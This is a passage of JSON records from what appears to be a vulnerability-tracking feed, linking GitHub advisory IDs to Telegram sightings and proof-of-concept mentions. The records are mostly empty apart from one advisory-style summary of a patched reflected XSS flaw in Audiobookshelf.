"Telegram/GtEl0gL_3vlqQaCU7OfUhEkhd2JzglfpejZoGd3NHIPeYno", "content": "", "creation_timestamp": "2026-03-27T23:28:35.000000Z"}, {"uuid": "062a7a12-7535-42fb-8fb8-9cbb2887fb93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F42F-PHVP-43X5", "type": "published-proof-of-concept", "source": "Telegram/GtEl0gL_3vlqQaCU7OfUhEkhd2JzglfpejZoGd3NHIPeYno", "content": "", "creation_timestamp": "2026-03-27T23:28:35.000000Z"}, {"uuid": "c0c77593-aef4-43b8-a954-5a4c66d1598c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GWHV-J974-6FXM", "type": "published-proof-of-concept", "source": "Telegram/DQ_c3fg_zqy6DN4suTckTk8JzzlHKPkbNE2HsjPTkc7SF-k", "content": "", "creation_timestamp": "2026-03-31T17:25:56.000000Z"}, {"uuid": "1936d6be-0760-459e-b8fc-bd6a0e4f6e41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQMP-FXGV-XVQ5", "type": "published-proof-of-concept", "source": "Telegram/DQ_c3fg_zqy6DN4suTckTk8JzzlHKPkbNE2HsjPTkc7SF-k", "content": "", "creation_timestamp": "2026-03-31T17:25:56.000000Z"}, {"uuid": "57235426-36e5-4860-8f49-7a92d71bbf1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4FJ-R33X-8V88", "type": "published-proof-of-concept", "source": "Telegram/e_KNKUl3o6DiU-2-jA1Bozh3wu6D5ajzBDCTSMbn5G7zvLo", "content": "", "creation_timestamp": "2026-03-31T17:26:20.000000Z"}, {"uuid": "becb2420-7ea2-4e8a-95ce-41ffd8376864", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MFJ6-6P54-M98C", "type": "published-proof-of-concept", "source": "Telegram/e_KNKUl3o6DiU-2-jA1Bozh3wu6D5ajzBDCTSMbn5G7zvLo", "content": "", "creation_timestamp": "2026-03-31T17:26:20.000000Z"}, {"uuid": "442b2908-5988-4d42-b786-3c5a23fad3e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F83R-V3H5-PCHF", "type": "seen", "source": "Telegram/gdbQBvnuOgX0zlyJL9kfjxoCoTp9WBTGn5-zeTA4spKkwcA", "content": "", "creation_timestamp": "2026-03-26T21:36:40.000000Z"}, {"uuid": "1a1b8c09-de59-41de-a3f6-13d5cf7c6d30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-35PF-37C6-JXJV", "type": "seen", "source": "Telegram/KBYE9xcSrVJP8YR7PFbodeWC5j3Vs7cAXceOWA5Jtu74trY", "content": "", "creation_timestamp": "2026-03-26T23:20:15.000000Z"}, {"uuid": "1ef228db-b066-492c-8a9b-5ef7ecbd3262", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V2MC-8Q95-G7HP", "type": "seen", "source": "Telegram/KBYE9xcSrVJP8YR7PFbodeWC5j3Vs7cAXceOWA5Jtu74trY", "content": "", "creation_timestamp": "2026-03-26T23:20:15.000000Z"}, {"uuid": "5585b4cc-305c-4fb9-85ab-a736a14cb39c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-34XJ-66V3-6J83", "type": "seen", "source": "Telegram/KBYE9xcSrVJP8YR7PFbodeWC5j3Vs7cAXceOWA5Jtu74trY", "content": "", "creation_timestamp": "2026-03-26T23:20:15.000000Z"}, {"uuid": "98e2ff32-8585-42e5-869a-f60b6afdfdca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XMW9-6R43-X9WW", "type": "seen", "source": "Telegram/KBYE9xcSrVJP8YR7PFbodeWC5j3Vs7cAXceOWA5Jtu74trY", "content": "", "creation_timestamp": "2026-03-26T23:20:15.000000Z"}, {"uuid": "92613e69-2674-40a9-a655-9c2ee9219d06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7972-PG2X-XR59", "type": "published-proof-of-concept", "source": "Telegram/iwwl46KpLYwipk_JFr9bJW43ngNWdoc7X8GY9RAN-oHOG28", "content": "", "creation_timestamp": "2026-03-27T01:18:44.000000Z"}, {"uuid": "799f2bfd-3414-41b3-9777-da4d2f97226b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJGM-7HWC-QQCR", "type": "seen", "source": "Telegram/rLqHCNltFCNj1PrF3FJbrFEjnsSClo3JgFDbDQ7L99dJsxY", "content": "", "creation_timestamp": "2026-03-27T23:27:39.000000Z"}, {"uuid": "b52a222f-8bc6-4c59-9c8f-4fe1a382aec6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ8W-X74C-H6P7", "type": "seen", "source": "Telegram/F-tbnQCu7KGoJ0u4OEM4TknejxA1jNnRqA-1uSHs9aPRtPw", "content": "", "creation_timestamp": "2026-04-06T23:22:19.000000Z"}, {"uuid": "89cf8b63-970a-40b6-966f-5f8ddda746bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6QCC-6Q27-WHP8", "type": "seen", "source": "Telegram/F-tbnQCu7KGoJ0u4OEM4TknejxA1jNnRqA-1uSHs9aPRtPw", "content": "", "creation_timestamp": "2026-04-06T23:22:19.000000Z"}, {"uuid": "379b5ba3-7d4d-469e-946e-85e49c571b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CF68-G7VF-9XRQ", "type": "seen", "source": "Telegram/d9ntGhgAXUNib3HVhoGCh5gTeuhEkXLp8JxGb0TRA4y7Jks", "content": "", "creation_timestamp": "2026-04-07T19:35:24.000000Z"}, {"uuid": "657e7374-b7c3-4d14-bde7-114037986680", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66FC-V5XJ-X859", "type": "seen", "source": "Telegram/d9ntGhgAXUNib3HVhoGCh5gTeuhEkXLp8JxGb0TRA4y7Jks", "content": "", "creation_timestamp": "2026-04-07T19:35:24.000000Z"}, {"uuid": "5f4c37e4-f391-493b-82a2-b235ece2c462", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P9FF-H696-F583", "type": "seen", "source": "Telegram/ORzlugWNJSN1mBT3L8tDKZ1H7oYKkiEmKL9E7e5xnpgHaiU", "content": "", "creation_timestamp": "2026-04-07T21:22:19.000000Z"}, {"uuid": "a78b6dfe-6f1b-4092-b2f8-ecf31a8be24c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V2WJ-Q39Q-566R", "type": "seen", "source": "Telegram/ORzlugWNJSN1mBT3L8tDKZ1H7oYKkiEmKL9E7e5xnpgHaiU", "content": "", "creation_timestamp": "2026-04-07T21:22:19.000000Z"}, {"uuid": "22312828-757e-4608-966f-cd079cd67e70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GPJ5-G38J-94V9", "type": "seen", "source": "Telegram/ORzlugWNJSN1mBT3L8tDKZ1H7oYKkiEmKL9E7e5xnpgHaiU", "content": "", "creation_timestamp": "2026-04-07T21:22:19.000000Z"}, {"uuid": "0c39102c-6490-47ee-be4d-300be141752f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F4F9-627C-JH33", "type": "seen", "source": "Telegram/ORzlugWNJSN1mBT3L8tDKZ1H7oYKkiEmKL9E7e5xnpgHaiU", "content": "", "creation_timestamp": "2026-04-07T21:22:19.000000Z"}, {"uuid": "c1971120-86df-4eb0-90a2-8251ed430dba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GCWF-3P7H-WM79", "type": "seen", "source": "Telegram/ORzlugWNJSN1mBT3L8tDKZ1H7oYKkiEmKL9E7e5xnpgHaiU", "content": "", "creation_timestamp": "2026-04-07T21:22:19.000000Z"}, {"uuid": "2d22bdef-2471-445c-9926-3cfb669093fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-776C-MPJ7-JM3R", "type": "published-proof-of-concept", "source": "Telegram/5IJp_GI-NXJK68kHyYMdgvSGJLM36tP-Nqj7HMsvD0ckNkg", "content": "", "creation_timestamp": "2026-04-08T01:15:45.000000Z"}, {"uuid": "22377383-7a7d-4df8-b3f6-1f53cde06d46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2GG9-6P7W-6CPJ", "type": "seen", "source": "Telegram/_n5Nok_-XlRHEre5O89LvYLplT02rw8wZYprnGR4USXlLgM", "content": "", "creation_timestamp": "2026-04-06T17:32:38.000000Z"}, {"uuid": "3bfda36b-e29e-4cb0-841a-29e8de9c9a0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69V7-XPR6-6GJM", "type": "seen", "source": "Telegram/_n5Nok_-XlRHEre5O89LvYLplT02rw8wZYprnGR4USXlLgM", "content": "", "creation_timestamp": "2026-04-06T17:32:38.000000Z"}, {"uuid": "73a0a307-9331-4940-877e-4c9310b6f23c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VMVW-QQ8W-WQHG", "type": "published-proof-of-concept", "source": "Telegram/QBh1F_HyWJUCKYAyST3Bw6jIrLbUd_JEHanO8DcWQ_ylla0", "content": "", "creation_timestamp": "2026-04-07T15:21:06.000000Z"}, {"uuid": "b9cdaae0-67f6-4790-bbff-66bf6d71e55b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FMWG-QCQH-M992", "type": "seen", "source": "Telegram/S0o7tCbZtDmnRvZjM5kXvvB9yXwoblxnXV5GlrmaLffoEZI", "content": "", "creation_timestamp": "2026-04-07T17:29:08.000000Z"}, {"uuid": "3721c090-0709-4017-9b5a-f71e2ad202af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-28G5-GG88-WH5M", "type": "seen", "source": "Telegram/yDDpU4nC0b44IAL16-yoyqmXwVbKF5D32H81GUj_gS-e3jc", "content": "", "creation_timestamp": "2026-04-07T17:29:27.000000Z"}, {"uuid": "8b3b1701-5f29-4710-b2d5-451d85b578e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GRQ6-Q49F-44XH", "type": "published-proof-of-concept", "source": "Telegram/ZjNX94OaGDygpp8THY2068PQ3qFjjnuznV-29wb7oU4kmRI", "content": "", "creation_timestamp": "2026-04-07T17:29:55.000000Z"}, {"uuid": "c7993265-432b-4a31-badb-2a7ec235aecb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5F97-JGG4-GQWR", "type": "published-proof-of-concept", "source": "Telegram/ZjNX94OaGDygpp8THY2068PQ3qFjjnuznV-29wb7oU4kmRI", "content": "", "creation_timestamp": "2026-04-07T17:29:55.000000Z"}, {"uuid": "c34d4aa0-2732-4a7a-be67-08dc1286db4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RFJ5-58HV-WC5F", "type": "seen", "source": "Telegram/nb1jq11aD1wlJ1YglJrLy9zN5IvfOUCCPtd3YJ7-KFKCMzY", "content": "", "creation_timestamp": "2026-04-08T23:33:06.000000Z"}, {"uuid": "97cf9f6c-a445-4a64-9ef6-6e8ce7c15cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-56P5-8MHR-2FPH", "type": "seen", "source": "Telegram/CihYo3BrEf6YGxiGwCEATnWAB3StjZgrXU02lSezsa6v_Ag", "content": "", "creation_timestamp": "2026-04-09T01:27:07.000000Z"}, {"uuid": "1ec0a816-0456-4209-ac2d-7aa9dc1488cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9QX4-67JM-CC66", "type": "seen", "source": "Telegram/CihYo3BrEf6YGxiGwCEATnWAB3StjZgrXU02lSezsa6v_Ag", "content": "", "creation_timestamp": "2026-04-09T01:27:07.000000Z"}, {"uuid": "d4094848-cd44-4ab9-9382-a6998dfe2643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QH5J-C28Q-C4RG", "type": "seen", "source": "Telegram/CihYo3BrEf6YGxiGwCEATnWAB3StjZgrXU02lSezsa6v_Ag", "content": "", "creation_timestamp": "2026-04-09T01:27:07.000000Z"}, {"uuid": "7b51df5b-353e-4386-99f1-a347549c68b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-479C-33WC-G2PG", "type": "seen", "source": "Telegram/CihYo3BrEf6YGxiGwCEATnWAB3StjZgrXU02lSezsa6v_Ag", "content": "", "creation_timestamp": "2026-04-09T01:27:07.000000Z"}, {"uuid": "36fcea9c-475c-45b8-bcdf-820bcbbc5e8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R8Q5-3595-3JH2", "type": "seen", "source": "Telegram/CihYo3BrEf6YGxiGwCEATnWAB3StjZgrXU02lSezsa6v_Ag", "content": "", "creation_timestamp": "2026-04-09T01:27:07.000000Z"}, {"uuid": "98901311-16d9-477e-bef6-075201566db2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H5QV-QJV4-PC5M", "type": "published-proof-of-concept", "source": "Telegram/ppPYRB7DfIS8K7XD1dDGxWPkeD0WXLmtAHjzWOZBPf3GFDk", "content": "", "creation_timestamp": "2026-04-09T01:28:04.000000Z"}, {"uuid": "273c27c4-e840-4c1f-a5af-5b9a4d2ad747", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XW7X-H9FJ-P2C7", "type": "published-proof-of-concept", "source": "Telegram/_GblWBcVIPYIrXGBoPy7b__AM0O64UdRepvGT6caCd3l3fA", "content": "", "creation_timestamp": "2026-03-27T03:17:50.000000Z"}, {"uuid": "519ba5ee-d224-46da-ae7f-9e11e4892d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7H8W-HJ9J-8RJW", "type": "published-proof-of-concept", "source": "Telegram/_GblWBcVIPYIrXGBoPy7b__AM0O64UdRepvGT6caCd3l3fA", "content": "", "creation_timestamp": "2026-03-27T03:17:50.000000Z"}, {"uuid": "5fa06a47-477a-478e-965d-ff56bac1dc46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-579Q-H82J-R5V2", "type": "published-proof-of-concept", "source": "Telegram/_GblWBcVIPYIrXGBoPy7b__AM0O64UdRepvGT6caCd3l3fA", "content": "", "creation_timestamp": "2026-03-27T03:17:50.000000Z"}, {"uuid": "2ca520ff-c7c6-475d-9813-55364ecd4c76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-47G3-C5HX-2Q3W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13788", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46338\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N)\n\ud83d\udd39 Description: Audiobookshelf is a self-hosted audiobook and podcast server. Prior to version 2.21.0, an improper input handling vulnerability in the `/api/upload` endpoint allows an attacker to perform a reflected cross-site scripting (XSS) attack by submitting malicious payloads in the `libraryId` field. The unsanitized input is reflected in the server\u2019s error message, enabling arbitrary JavaScript execution in a victim's browser. This issue has been patched in version 2.21.0.\n\ud83d\udccf Published: 2025-04-29T04:34:44.713Z\n\ud83d\udccf Modified: 2025-04-29T04:34:44.713Z\n\ud83d\udd17 References:\n1. https://github.com/advplyr/audiobookshelf/security/advisories/GHSA-47g3-c5hx-2q3w\n2. https://github.com/advplyr/audiobookshelf/commit/35870a01583b2947030f4e3d4ac769c3ff298386", "creation_timestamp": "2025-04-29T05:11:29.000000Z"}, {"uuid": "c3508f6b-1013-40ef-9b1a-0233198ea547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78H2-9FRX-2JM8", "type": "published-proof-of-concept", "source": "Telegram/ECjdy8s76GZ_Bal_wnIB79ij56tbajMepr_VumTyCn-zmzM", "content": "", "creation_timestamp": "2026-04-06T19:28:45.000000Z"}, {"uuid": "97d20774-8834-4ac5-a773-f81f95dc900d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53MR-6C8Q-9789", "type": "published-proof-of-concept", "source": "Telegram/ECjdy8s76GZ_Bal_wnIB79ij56tbajMepr_VumTyCn-zmzM", "content": "", "creation_timestamp": "2026-04-06T19:28:45.000000Z"}, {"uuid": "548fde31-0a9c-4ef0-ac11-fd57615da7a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H27X-RFFW-24P4", "type": "seen", "source": "Telegram/RceOsMbVCcV6wQMI9eJfY-7gRIWU138I_3ZVebAFZlOd7ZE", "content": "", "creation_timestamp": "2026-04-07T19:34:12.000000Z"}, {"uuid": "bacfa624-3fa2-4e26-a0f2-4bbbef8f0f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-583G-FG76-FHFR", "type": "seen", "source": "Telegram/RceOsMbVCcV6wQMI9eJfY-7gRIWU138I_3ZVebAFZlOd7ZE", "content": "", "creation_timestamp": "2026-04-07T19:34:12.000000Z"}, {"uuid": "6c7b3fae-73c3-45d2-af86-c299944a2fef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7526-J432-6PPP", "type": "seen", "source": "Telegram/RceOsMbVCcV6wQMI9eJfY-7gRIWU138I_3ZVebAFZlOd7ZE", "content": "", "creation_timestamp": "2026-04-07T19:34:12.000000Z"}, {"uuid": "d6a3ea16-8d2d-43f8-9569-54b677cfaef5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H7HG-F7CW-9XWC", "type": "seen", "source": "Telegram/yEep_Cm2Odjvpf0uI90hS1hr8dhkmidpoORZ8hNAmW5Xwfo", "content": "", "creation_timestamp": "2026-04-07T19:35:16.000000Z"}, {"uuid": "b9a22f84-85bb-4bbd-899c-627bb4e9ccd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PM2V-GGH4-MP7P", "type": "seen", "source": "Telegram/KxTaYuDzH0Z1i49WRh0FHus2MwhOECzgEb0vJJCyVaWiEf0", "content": "", "creation_timestamp": "2026-04-07T19:35:49.000000Z"}, {"uuid": "8bc4ac33-c0e1-47f9-89fa-8e54683418d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GHG-QFQW-RCQF", "type": "seen", "source": "Telegram/KxTaYuDzH0Z1i49WRh0FHus2MwhOECzgEb0vJJCyVaWiEf0", "content": "", "creation_timestamp": "2026-04-07T19:35:49.000000Z"}, {"uuid": "1c612221-ae4c-4c3e-9ce3-3e34765fab41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7FR4-MVFM-CXFX", "type": "seen", "source": "Telegram/KxTaYuDzH0Z1i49WRh0FHus2MwhOECzgEb0vJJCyVaWiEf0", "content": "", "creation_timestamp": "2026-04-07T19:35:49.000000Z"}, {"uuid": "8e5cadb0-0f0e-458a-ae3d-6e03776c5179", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3H69-VJFF-JJ5C", "type": "seen", "source": "Telegram/KxTaYuDzH0Z1i49WRh0FHus2MwhOECzgEb0vJJCyVaWiEf0", "content": "", "creation_timestamp": "2026-04-07T19:35:49.000000Z"}, {"uuid": "966bed82-6614-4803-8709-d57b673ae91d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3P2-MX78-PXHC", "type": "seen", "source": "Telegram/KxTaYuDzH0Z1i49WRh0FHus2MwhOECzgEb0vJJCyVaWiEf0", "content": "", "creation_timestamp": "2026-04-07T19:35:49.000000Z"}, {"uuid": "ce289622-8268-4f72-b3d2-4da09a2eeaf0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66F7-4P96-MWW9", "type": "seen", "source": "Telegram/KxTaYuDzH0Z1i49WRh0FHus2MwhOECzgEb0vJJCyVaWiEf0", "content": "", "creation_timestamp": "2026-04-07T19:35:49.000000Z"}, {"uuid": "44158dbc-add9-4ca0-a691-d50af18d08ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H22J-FRRF-5VXQ", "type": "published-proof-of-concept", "source": "Telegram/qg3HF91OLRRzWQbI7_Pfv-fl8vLkHd7iL-mBbLD40slyOww", "content": "", "creation_timestamp": "2026-04-02T22:23:12.000000Z"}, {"uuid": "de6d963d-9173-4af9-b2a5-fccac38a3cc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5W5C-766X-265G", "type": "published-proof-of-concept", "source": "Telegram/qg3HF91OLRRzWQbI7_Pfv-fl8vLkHd7iL-mBbLD40slyOww", "content": "", "creation_timestamp": "2026-04-02T22:23:12.000000Z"}, {"uuid": "2d4dd5f0-e772-45c0-8845-2a2255d62456", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7FG7-WX5Q-6M3V", "type": "published-proof-of-concept", "source": "Telegram/qg3HF91OLRRzWQbI7_Pfv-fl8vLkHd7iL-mBbLD40slyOww", "content": "", "creation_timestamp": "2026-04-02T22:23:12.000000Z"}, {"uuid": "a0e455a9-6bb3-4811-a050-b9f91ee0539f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4356-876G-RFMH", "type": "published-proof-of-concept", "source": "Telegram/qg3HF91OLRRzWQbI7_Pfv-fl8vLkHd7iL-mBbLD40slyOww", "content": "", "creation_timestamp": "2026-04-02T22:23:12.000000Z"}, {"uuid": "81ebac28-40b8-4e43-bf31-dce662e34400", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WG7J-PCC3-H4RH", "type": "published-proof-of-concept", "source": "Telegram/23ZcvUWmnJsq-zA1xOv2ctyvywAVz8hRL5r96BcfYjQKx08", "content": "", "creation_timestamp": "2026-04-02T22:22:04.000000Z"}, {"uuid": "a68a751f-11d9-442b-a85f-10b17fa9768b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W254-4HP5-7CVV", "type": "published-proof-of-concept", "source": "Telegram/23ZcvUWmnJsq-zA1xOv2ctyvywAVz8hRL5r96BcfYjQKx08", "content": "", "creation_timestamp": "2026-04-02T22:22:04.000000Z"}, {"uuid": "e04decca-7783-42c9-8905-5cb00f034abd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R4F2-3M54-PP7Q", "type": "published-proof-of-concept", "source": "Telegram/7aT9UpYbZ02LD1lZLti1mg9cdxIpZxAoIiq3Sp7jGujjzO4", "content": "", "creation_timestamp": "2026-04-04T01:19:10.000000Z"}, {"uuid": "bb4e1638-707b-4181-ad76-0f1f018d2d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W2FM-2CPV-W7V5", "type": "published-proof-of-concept", "source": "Telegram/xP_pZj4ci_bcCYqgi-T_PIS6ijPmmH3NCtwSFt5Cz1eCFxQ", "content": "", "creation_timestamp": "2026-04-04T05:16:04.000000Z"}, {"uuid": "527b5481-dec9-4ceb-8300-927802691516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2F5-332J-9XWQ", "type": "published-proof-of-concept", "source": "Telegram/xP_pZj4ci_bcCYqgi-T_PIS6ijPmmH3NCtwSFt5Cz1eCFxQ", "content": "", "creation_timestamp": "2026-04-04T05:16:04.000000Z"}, {"uuid": "699c3124-6d8a-4733-8f68-6391cb0e94e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63HF-3VF5-4WQF", "type": "published-proof-of-concept", "source": "Telegram/xP_pZj4ci_bcCYqgi-T_PIS6ijPmmH3NCtwSFt5Cz1eCFxQ", "content": "", "creation_timestamp": "2026-04-04T05:16:04.000000Z"}, {"uuid": "3f087131-019b-479d-8ad2-1efb446aa27d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": 